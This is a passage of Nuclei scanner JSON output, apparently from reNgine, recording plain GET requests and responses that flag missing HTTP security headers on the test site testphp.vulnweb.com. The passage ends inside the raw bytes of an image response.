A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.345896606Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.345899433Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.497211641Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.49726881Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.497286275Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.497278501Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:50.137245976Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:50.13730556Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd